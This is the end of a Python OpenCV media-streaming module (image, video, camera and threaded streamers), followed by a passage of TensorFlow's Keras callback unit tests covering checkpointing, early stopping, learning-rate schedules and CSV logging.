:param path: Path to file or directory.
Could be None, which implies camera media type.
"""
if isinstance(path, str):
path = Path(path)
media_type: MediaType
if path is None:
media_type = MediaType.camera
elif path.is_dir():
if _get_filenames(path, MediaType.image):
media_type = MediaType.image
elif path.is_file():
if _is_file_with_supported_extensions(path, _get_extensions(MediaType.image)):
media_type = MediaType.image
elif _is_file_with_supported_extensions(path, _get_extensions(MediaType.video)):
media_type = MediaType.video
else:
raise ValueError("File extension not supported.")
else:
raise ValueError("File or folder does not exist")
return media_type
def _get_extensions(media_type: MediaType) -> Tuple[str, ...]:
"""
Get extensions of the input media type.
:param media_type: Type of the media. Either image or video.
:return: Supported extensions for the corresponding media type.
:example:
>>> _get_extensions(media_type=MediaType.image)
('.jpg', '.jpeg', '.png', '.ppm', '.bmp', '.pgm', '.tif', '.tiff', '.webp')
>>> _get_extensions(media_type=MediaType.video)
('.avi', '.mp4')
"""
return getattr(MEDIA_EXTENSIONS, media_type.name)
def _is_file_with_supported_extensions(path: Path, extensions: Tuple[str, ...]) -> bool:
"""
Check if the file is supported for the media type
:param path: File path to check
:param extensions: Supported extensions for the media type
:example:
>>> from pathlib import Path
>>> path = Path("./demo.mp4")
>>> extensions = _get_extensions(media_type=MediaType.video)
>>> _is_file_with_supported_extensions(path, extensions)
True
>>> path = Path("demo.jpg")
>>> extensions = _get_extensions(media_type=MediaType.image)
>>> _is_file_with_supported_extensions(path, extensions)
True
>>> path = Path("demo.mp3")
>>> extensions = _get_extensions(media_type=MediaType.image)
>>> _is_file_with_supported_extensions(path, extensions)
False
"""
return path.suffix.lower() in extensions
def _get_filenames(path: Union[str, Path], media_type: MediaType) -> List[str]:
"""
Get filenames from a directory or a path to a file.
:param path: Path to the file or to the location that contains files.
:param media_type: Type of the media (image or video)
:example:
>>> path = "../images"
>>> _get_filenames(path, media_type=MediaType.image)
['images/1.jpeg', 'images/2.jpeg', 'images/3.jpeg', 'images/4.jpeg', 'images/5.jpeg']
"""
extensions = _get_extensions(media_type)
filenames: List[str] = []
if media_type == MediaType.camera:
raise ValueError(
"Cannot get filenames for camera. Only image and video files are supported."
)
if isinstance(path, str):
path = Path(path)
if path.is_file():
if _is_file_with_supported_extensions(path, extensions):
filenames = [path.as_posix()]
else:
raise ValueError("Extension not supported for media type")
if path.is_dir():
for filename in path.rglob("*"):
if _is_file_with_supported_extensions(filename, extensions):
filenames.append(filename.as_posix())
filenames = natsorted(filenames) # type: ignore[assignment]
if len(filenames) == 0:
raise FileNotFoundError(f"No {media_type.name} file found in {path}!")
return filenames
def _read_video_stream(stream: cv2.VideoCapture) -> Iterator[np.ndarray]:
"""
Read video and yield the frame.
:param stream: Video stream captured via OpenCV's VideoCapture
:return: Individual frame
"""
while True:
frame_available, frame = stream.read()
if not frame_available:
break
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
yield frame
stream.release()
class BaseStreamer(metaclass=abc.ABCMeta):
"""
Base Streamer interface to implement Image, Video and Camera streamers.
"""
@abc.abstractmethod
def get_stream(self, stream_input):
"""
Get the streamer object, depending on the media type.
:param stream_input: Path to the stream or
camera device index in case to capture from camera.
:return: Streamer object.
"""
raise NotImplementedError
@abc.abstractmethod
def __iter__(self) -> Iterator[np.ndarray]:
"""
Iterate through the streamer object that is a Python Generator object.
:return: Yield the image or video frame.
"""
raise NotImplementedError
def _process_run(streamer: BaseStreamer, buffer: multiprocessing.Queue):
"""
Private function that is run by the background process.
Reads frames from the streamer and puts them into the shared buffer,
blocking whenever the buffer is full.
:param streamer: The streamer to retrieve frames from
:param buffer: The buffer to place the retrieved frames in
"""
for frame in streamer:
buffer.put(frame)
class ThreadedStreamer(BaseStreamer):
"""
Runs a BaseStreamer in a separate process.
:param streamer: The streamer to run in the background
:param buffer_size: Number of frames to buffer internally
:example:
>>> streamer = VideoStreamer(path="../demo.mp4")
>>> threaded_streamer = ThreadedStreamer(streamer)
... for frame in threaded_streamer:
... pass
"""
def __init__(self, streamer: BaseStreamer, buffer_size: int = 2):
self.buffer_size = buffer_size
self.streamer = streamer
def get_stream(self, _=None) -> BaseStreamer:
return self.streamer
def __iter__(self) -> Iterator[np.ndarray]:
buffer: multiprocessing.Queue = multiprocessing.Queue(maxsize=self.buffer_size)
process = multiprocessing.Process(
target=_process_run, args=(self.get_stream(), buffer)
)
# Make the process a daemon so that it will exit when the main program exits as well
process.daemon = True
process.start()
try:
while process.is_alive() or not buffer.empty():
try:
yield buffer.get(timeout=0.1)
except queue.Empty:
pass
except GeneratorExit:
process.terminate()
finally:
process.join(timeout=0.1)
# Process.kill() is only available from Python 3.7 onwards.
# Skip it if running an older Python version.
if sys.version_info >= (3, 7) and process.exitcode is None:
process.kill()
class VideoStreamer(BaseStreamer):
"""
Video Streamer
:param path: Path to the video file or directory.
:example:
>>> streamer = VideoStreamer(path="../demo.mp4")
... for frame in streamer:
... pass
"""
def __init__(self, path: str) -> None:
self.media_type = MediaType.video
self.filenames = _get_filenames(path, media_type=MediaType.video)
def get_stream(self, stream_input: str) -> cv2.VideoCapture:
return cv2.VideoCapture(stream_input)
def __iter__(self) -> Iterator[np.ndarray]:
for filename in self.filenames:
stream = self.get_stream(stream_input=filename)
yield from _read_video_stream(stream)
class CameraStreamer(BaseStreamer):
"""
Stream video frames from camera
:param camera_device: Camera device index e.g, 0, 1
:example:
>>> streamer = CameraStreamer(camera_device=0)
... for frame in streamer:
... cv2.imshow("Window", frame)
... if ord("q") == cv2.waitKey(1):
... break
"""
def __init__(self, camera_device: Optional[int] = None):
self.media_type = MediaType.camera
self.camera_device = 0 if camera_device is None else camera_device
def get_stream(self, stream_input: int):
return cv2.VideoCapture(stream_input)
def __iter__(self) -> Iterator[np.ndarray]:
stream = self.get_stream(stream_input=self.camera_device)
yield from _read_video_stream(stream)
class ImageStreamer(BaseStreamer):
"""
Stream from image file or directory.
:param path: Path to an image or directory.
:example:
>>> streamer = ImageStreamer(path="../images")
... for frame in streamer:
... cv2.imshow("Window", frame)
... cv2.waitKey(0)
"""
def __init__(self, path: str) -> None:
self.media_type = MediaType.image
self.filenames = _get_filenames(path=path, media_type=MediaType.image)
@staticmethod
def get_stream(stream_input: str) -> Iterable[np.ndarray]:
image = cv2.imread(stream_input)
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
yield image
def __iter__(self) -> Iterator[np.ndarray]:
for filename in self.filenames:
yield from self.get_stream(stream_input=filename)
def get_streamer(
path: Optional[str] = None,
camera_device: Optional[int] = None,
threaded: bool = False,
) -> BaseStreamer:
"""
Get streamer object based on the file path or camera device index provided.
:param path: Path to file or directory.
:param camera_device: Camera device index.
:param threaded: Threaded streaming option
"""
if path is not None and camera_device is not None:
raise ValueError(
"Both path and camera device is provided. Choose either camera or path to a image/video file."
)
media_type = _get_media_type(path)
streamer: BaseStreamer
if path is not None and media_type == MediaType.image:
streamer = ImageStreamer(path)
elif path is not None and media_type == MediaType.video:
streamer = VideoStreamer(path)
elif media_type == MediaType.camera:
if camera_device is None:
camera_device = 0
streamer = CameraStreamer(camera_device)
else:
raise ValueError("Unknown media type")
if threaded:
streamer = ThreadedStreamer(streamer)
return streamer
|
callbacks_test.py
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Keras callbacks."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import csv
import os
import re
import shutil
import sys
import threading
import unittest
from absl.testing import parameterized
import numpy as np
from tensorflow.python import keras
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.framework import random_seed
from tensorflow.python.keras import keras_parameterized
from tensorflow.python.keras import testing_utils
from tensorflow.python.ops import array_ops
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.summary import summary_iterator
from tensorflow.python.training import adam
try:
import h5py # pylint:disable=g-import-not-at-top
except ImportError:
h5py = None
try:
import requests # pylint:disable=g-import-not-at-top
except ImportError:
requests = None
TRAIN_SAMPLES = 10
TEST_SAMPLES = 10
NUM_CLASSES = 2
INPUT_DIM = 3
NUM_HIDDEN = 5
BATCH_SIZE = 5
class Counter(keras.callbacks.Callback):
"""Counts the number of times each callback method was run.
Attributes:
method_counts: dict. Contains the counts of times each callback method was
run.
"""
def __init__(self):
self.method_counts = collections.defaultdict(int)
methods_to_count = [
'on_batch_begin', 'on_batch_end', 'on_epoch_begin', 'on_epoch_end',
'on_predict_batch_begin', 'on_predict_batch_end', 'on_predict_begin',
'on_predict_end', 'on_test_batch_begin', 'on_test_batch_end',
'on_test_begin', 'on_test_end', 'on_train_batch_begin',
'on_train_batch_end', 'on_train_begin', 'on_train_end'
]
for method_name in methods_to_count:
setattr(self, method_name,
self.wrap_with_counts(method_name, getattr(self, method_name)))
def wrap_with_counts(self, method_name, method):
def _call_and_count(*args, **kwargs):
self.method_counts[method_name] += 1
return method(*args, **kwargs)
return _call_and_count
def _get_numpy():
return np.ones((10, 10)), np.ones((10, 1))
def _get_sequence():
class MySequence(keras.utils.data_utils.Sequence):
def __getitem__(self, _):
return np.ones((2, 10)), np.ones((2, 1))
def __len__(self):
return 5
return MySequence(), None
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes
class CallbackCountsTest(keras_parameterized.TestCase):
def _check_counts(self, counter, expected_counts):
"""Checks that the counts registered by `counter` are those expected."""
for method_name, expected_count in expected_counts.items():
self.assertEqual(
counter.method_counts[method_name],
expected_count,
msg='For method {}: expected {}, got: {}'.format(
method_name, expected_count, counter.method_counts[method_name]))
def _get_model(self):
layers = [
keras.layers.Dense(10, activation='relu'),
keras.layers.Dense(1, activation='sigmoid')
]
model = testing_utils.get_model_from_layers(layers, input_shape=(10,))
model.compile(
adam.AdamOptimizer(0.001),
'binary_crossentropy',
run_eagerly=testing_utils.should_run_eagerly())
return model
@parameterized.named_parameters(('with_numpy', _get_numpy()),
('with_sequence', _get_sequence()))
def test_callback_hooks_are_called_in_fit(self, data):
x, y = data
val_x, val_y = np.ones((4, 10)), np.ones((4, 1))
model = self._get_model()
counter = Counter()
model.fit(
x,
y,
validation_data=(val_x, val_y),
batch_size=2,
epochs=5,
callbacks=[counter])
self._check_counts(
counter, {
'on_batch_begin': 25,
'on_batch_end': 25,
'on_epoch_begin': 5,
'on_epoch_end': 5,
'on_predict_batch_begin': 0,
'on_predict_batch_end': 0,
'on_predict_begin': 0,
'on_predict_end': 0,
'on_test_batch_begin': 10,
'on_test_batch_end': 10,
'on_test_begin': 5,
'on_test_end': 5,
'on_train_batch_begin': 25,
'on_train_batch_end': 25,
'on_train_begin': 1,
'on_train_end': 1
})
@parameterized.named_parameters(('with_numpy', _get_numpy()),
('with_sequence', _get_sequence()))
def test_callback_hooks_are_called_in_evaluate(self, data):
x, y = data
model = self._get_model()
counter = Counter()
model.evaluate(x, y, batch_size=2, callbacks=[counter])
self._check_counts(
counter, {
'on_test_batch_begin': 5,
'on_test_batch_end': 5,
'on_test_begin': 1,
'on_test_end': 1
})
@parameterized.named_parameters(('with_numpy', _get_numpy()),
('with_sequence', _get_sequence()))
def test_callback_hooks_are_called_in_predict(self, data):
x = data[0]
model = self._get_model()
counter = Counter()
model.predict(x, batch_size=2, callbacks=[counter])
self._check_counts(
counter, {
'on_predict_batch_begin': 5,
'on_predict_batch_end': 5,
'on_predict_begin': 1,
'on_predict_end': 1
})
def test_callback_list_methods(self):
counter = Counter()
callback_list = keras.callbacks.CallbackList([counter])
batch = 0
callback_list.on_test_batch_begin(batch)
callback_list.on_test_batch_end(batch)
callback_list.on_predict_batch_begin(batch)
callback_list.on_predict_batch_end(batch)
self._check_counts(
counter, {
'on_test_batch_begin': 1,
'on_test_batch_end': 1,
'on_predict_batch_begin': 1,
'on_predict_batch_end': 1
})
class KerasCallbacksTest(keras_parameterized.TestCase):
def _get_model(self, input_shape=None):
layers = [
keras.layers.Dense(3, activation='relu'),
keras.layers.Dense(2, activation='softmax')
]
model = testing_utils.get_model_from_layers(layers, input_shape=input_shape)
model.compile(
loss='mse',
optimizer='rmsprop',
metrics=[keras.metrics.CategoricalAccuracy(name='my_acc')],
run_eagerly=testing_utils.should_run_eagerly())
return model
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes
def test_progbar_logging(self):
model = self._get_model(input_shape=(3,))
x = array_ops.ones((50, 3))
y = array_ops.zeros((50, 2))
dataset = dataset_ops.Dataset.from_tensor_slices((x, y)).batch(10)
expected_log = r'(.*- loss:.*- my_acc:.*)+'
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(dataset, epochs=2, steps_per_epoch=10)
self.assertRegexpMatches(printed.contents(), expected_log)
@keras_parameterized.run_with_all_model_types(exclude_models='functional')
@keras_parameterized.run_all_keras_modes
def test_progbar_logging_deferred_model_build(self):
model = self._get_model()
self.assertFalse(model.built)
x = array_ops.ones((50, 3))
y = array_ops.zeros((50, 2))
dataset = dataset_ops.Dataset.from_tensor_slices((x, y)).batch(10)
expected_log = r'(.*- loss:.*- my_acc:.*)+'
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(dataset, epochs=2, steps_per_epoch=10)
self.assertRegexpMatches(printed.contents(), expected_log)
@keras_parameterized.run_with_all_model_types
def test_ModelCheckpoint(self):
if h5py is None:
return # Skip test if models cannot be saved.
layers = [
keras.layers.Dense(NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'),
keras.layers.Dense(NUM_CLASSES, activation='softmax')
]
model = testing_utils.get_model_from_layers(layers, input_shape=(10,))
model.compile(
loss='categorical_crossentropy', optimizer='rmsprop', metrics=['acc'])
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
filepath = os.path.join(temp_dir, 'checkpoint')
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
# case 1
monitor = 'val_loss'
save_best_only = False
mode = 'auto'
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy', optimizer='rmsprop', metrics=['acc'])
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# case 2
mode = 'min'
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# case 3
mode = 'max'
monitor = 'val_acc'
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# case 4
save_best_only = True
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# Case: metric not available.
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor='unknown',
save_best_only=True)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
# File won't be written.
assert not os.path.exists(filepath)
# case 5
save_best_only = False
period = 2
mode = 'auto'
filepath = os.path.join(temp_dir, 'checkpoint.{epoch:02d}.h5')
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
period=period)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=4,
verbose=1)
assert os.path.exists(filepath.format(epoch=2))
assert os.path.exists(filepath.format(epoch=4))
os.remove(filepath.format(epoch=2))
os.remove(filepath.format(epoch=4))
assert not os.path.exists(filepath.format(epoch=1))
assert not os.path.exists(filepath.format(epoch=3))
# Invalid use: this will raise a warning but not an Exception.
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode='unknown')
def test_EarlyStopping(self):
with self.cached_session():
np.random.seed(123)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy', optimizer='rmsprop', metrics=['acc'])
cases = [
('max', 'val_acc'),
('min', 'val_loss'),
('auto', 'val_acc'),
('auto', 'loss'),
('unknown', 'unknown')
]
for mode, monitor in cases:
patience = 0
cbks = [
keras.callbacks.EarlyStopping(
patience=patience, monitor=monitor, mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
def test_EarlyStopping_reuse(self):
with self.cached_session():
np.random.seed(1337)
patience = 3
data = np.random.random((100, 1))
labels = np.where(data > 0.5, 1, 0)
model = keras.models.Sequential((keras.layers.Dense(
1, input_dim=1, activation='relu'), keras.layers.Dense(
1, activation='sigmoid'),))
model.compile(
optimizer='sgd', loss='binary_crossentropy', metrics=['accuracy'])
weights = model.get_weights()
stopper = keras.callbacks.EarlyStopping(monitor='acc', patience=patience)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) >= patience
# This should allow training to go for at least `patience` epochs
model.set_weights(weights)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) >= patience
def test_EarlyStopping_with_baseline(self):
with self.cached_session():
np.random.seed(1337)
baseline = 0.5
(data, labels), _ = testing_utils.get_test_data(
train_samples=100,
test_samples=50,
input_shape=(1,),
num_classes=NUM_CLASSES)
model = testing_utils.get_small_sequential_mlp(
num_hidden=1, num_classes=1, input_dim=1)
model.compile(
optimizer='sgd', loss='binary_crossentropy', metrics=['acc'])
stopper = keras.callbacks.EarlyStopping(monitor='acc',
baseline=baseline)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) == 1
patience = 3
stopper = keras.callbacks.EarlyStopping(monitor='acc',
patience=patience,
baseline=baseline)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) >= patience
def test_EarlyStopping_final_weights_when_restoring_model_weights(self):
class DummyModel(object):
def __init__(self):
self.stop_training = False
self.weights = -1
def get_weights(self):
return self.weights
def set_weights(self, weights):
self.weights = weights
def set_weight_to_epoch(self, epoch):
self.weights = epoch
early_stop = keras.callbacks.EarlyStopping(monitor='val_loss',
patience=2,
restore_best_weights=True)
early_stop.model = DummyModel()
losses = [0.2, 0.15, 0.1, 0.11, 0.12]
# The best configuration is in epoch 2 (loss = 0.1000).
epochs_trained = 0
early_stop.on_train_begin()
for epoch in range(len(losses)):
epochs_trained += 1
early_stop.model.set_weight_to_epoch(epoch=epoch)
early_stop.on_epoch_end(epoch, logs={'val_loss': losses[epoch]})
if early_stop.model.stop_training:
break
# The best configuration is in epoch 2 (loss = 0.1000),
# and while patience = 2, we're restoring the best weights,
# so we end up at the epoch with the best weights, i.e. epoch 2
self.assertEqual(early_stop.model.get_weights(), 2)
def test_RemoteMonitor(self):
if requests is None:
return
monitor = keras.callbacks.RemoteMonitor()
# This will raise a warning since the default address is unreachable:
monitor.on_epoch_end(0, logs={'loss': 0.})
def test_LearningRateScheduler(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
cbks = [keras.callbacks.LearningRateScheduler(lambda x: 1. / (1. + x))]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
assert (
float(keras.backend.get_value(
model.optimizer.lr)) - 0.2) < keras.backend.epsilon()
cbks = [keras.callbacks.LearningRateScheduler(lambda x, lr: lr / 2)]
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
assert (
float(keras.backend.get_value(
model.optimizer.lr)) - 0.01 / 4) < keras.backend.epsilon()
def test_ReduceLROnPlateau(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
def make_model():
random_seed.set_random_seed(1234)
np.random.seed(1337)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy',
optimizer=keras.optimizers.SGD(lr=0.1))
return model
# TODO(psv): Make sure the callback works correctly when min_delta is
# set as 0. Test fails when the order of this callback and assertion is
# interchanged.
model = make_model()
cbks = [
keras.callbacks.ReduceLROnPlateau(
monitor='val_loss',
factor=0.1,
min_delta=0,
patience=1,
cooldown=5)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
self.assertAllClose(
float(keras.backend.get_value(model.optimizer.lr)), 0.1, atol=1e-4)
model = make_model()
# This should reduce the LR after the first epoch (due to high epsilon).
cbks = [
keras.callbacks.ReduceLROnPlateau(
monitor='val_loss',
factor=0.1,
min_delta=10,
patience=1,
cooldown=5)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=2)
self.assertAllClose(
float(keras.backend.get_value(model.optimizer.lr)), 0.01, atol=1e-4)
def test_ReduceLROnPlateau_patience(self):
class DummyOptimizer(object):
def __init__(self):
self.lr = keras.backend.variable(1.0)
class DummyModel(object):
def __init__(self):
self.optimizer = DummyOptimizer()
reduce_on_plateau = keras.callbacks.ReduceLROnPlateau(
monitor='val_loss', patience=2)
reduce_on_plateau.model = DummyModel()
losses = [0.0860, 0.1096, 0.1040]
lrs = []
for epoch in range(len(losses)):
reduce_on_plateau.on_epoch_end(epoch, logs={'val_loss': losses[epoch]})
lrs.append(keras.backend.get_value(reduce_on_plateau.model.optimizer.lr))
# The learning rates should be 1.0 except the last one
for lr in lrs[:-1]:
self.assertEqual(lr, 1.0)
self.assertLess(lrs[-1], 1.0)
def test_ReduceLROnPlateau_backwards_compatibility(self):
with test.mock.patch.object(logging, 'warning') as mock_log:
reduce_on_plateau = keras.callbacks.ReduceLROnPlateau(epsilon=1e-13)
self.assertRegexpMatches(
str(mock_log.call_args), '`epsilon` argument is deprecated')
self.assertFalse(hasattr(reduce_on_plateau, 'epsilon'))
self.assertTrue(hasattr(reduce_on_plateau, 'min_delta'))
self.assertEqual(reduce_on_plateau.min_delta, 1e-13)
def test_CSVLogger(self):
with self.cached_session():
np.random.seed(1337)
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
filepath = os.path.join(temp_dir, 'log.tsv')
sep = '\t'
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
def make_model():
np.random.seed(1337)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy',
optimizer=keras.optimizers.SGD(lr=0.1),
metrics=['accuracy'])
return model
# case 1, create new file with defined separator
model = make_model()
cbks = [keras.callbacks.CSVLogger(filepath, separator=sep)]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
with open(filepath) as csvfile:
dialect = csv.Sniffer().sniff(csvfile.read())
assert dialect.delimiter == sep
del model
del cbks
# case 2, append data to existing file, skip header
model = make_model()
cbks = [keras.callbacks.CSVLogger(filepath, separator=sep, append=True)]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
# case 3, reuse of CSVLogger object
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
with open(filepath) as csvfile:
list_lines = csvfile.readlines()
for line in list_lines:
assert line.count(sep) == 4
assert len(list_lines) == 5
output = ' '.join(list_lines)
assert len(re.findall('epoch', output)) == 1
os.remove(filepath)
def test_stop_training_csv(self):
# Test that using the CSVLogger callback with the TerminateOnNaN callback
# does not result in invalid CSVs.
np.random.seed(1337)
tmpdir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, tmpdir, ignore_errors=True)
with self.cached_session():
fp = os.path.join(tmpdir, 'test.csv')
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
cbks = [keras.callbacks.TerminateOnNaN(), keras.callbacks.CSVLogger(fp)]
model = keras.models.Sequential()
for _ in range(5):
model.add(keras.layers.Dense(2, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='linear'))
model.compile(loss='mean_squared_error',
optimizer='rmsprop')
def data_generator():
i = 0
max_batch_index = len(x_train) // BATCH_SIZE
tot = 0
while 1:
if tot > 3 * len(x_train):
yield (np.ones([BATCH_SIZE, INPUT_DIM]) * np.nan,
np.ones([BATCH_SIZE, NUM_CLASSES]) * np.nan)
else:
yield (x_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE],
y_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE])
i += 1
tot += 1
i %= max_batch_index
history = model.fit_generator(data_generator(),
len(x_train) // BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=20)
loss = history.history['loss']
assert len(loss) > 1
assert loss[-1] == np.inf or np.isnan(loss[-1])
values = []
with open(fp) as f:
for x in csv.reader(f):
# On Windows, due to \r\n line ends we may end up reading empty lines
# after each line. Skip empty lines.
if x:
values.append(x)
assert 'nan' in values[-1], 'The last epoch was not logged.'
def test_TerminateOnNaN(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
cbks = [keras.callbacks.TerminateOnNaN()]
model = keras.models.Sequential()
initializer = keras.initializers.Constant(value=1e5)
for _ in range(5):
model.add(
keras.layers.Dense(
2,
input_dim=INPUT_DIM,
activation='relu',
kernel_initializer=initializer))
model.add(keras.layers.Dense(NUM_CLASSES))
model.compile(loss='mean_squared_error', optimizer='rmsprop')
history = model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=20)
loss = history.history['loss']
self.assertEqual(len(loss), 1)
self.assertEqual(loss[0], np.inf)
@unittest.skipIf(
os.name == 'nt',
'use_multiprocessing=True does not work on windows properly.')
def test_LambdaCallback(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
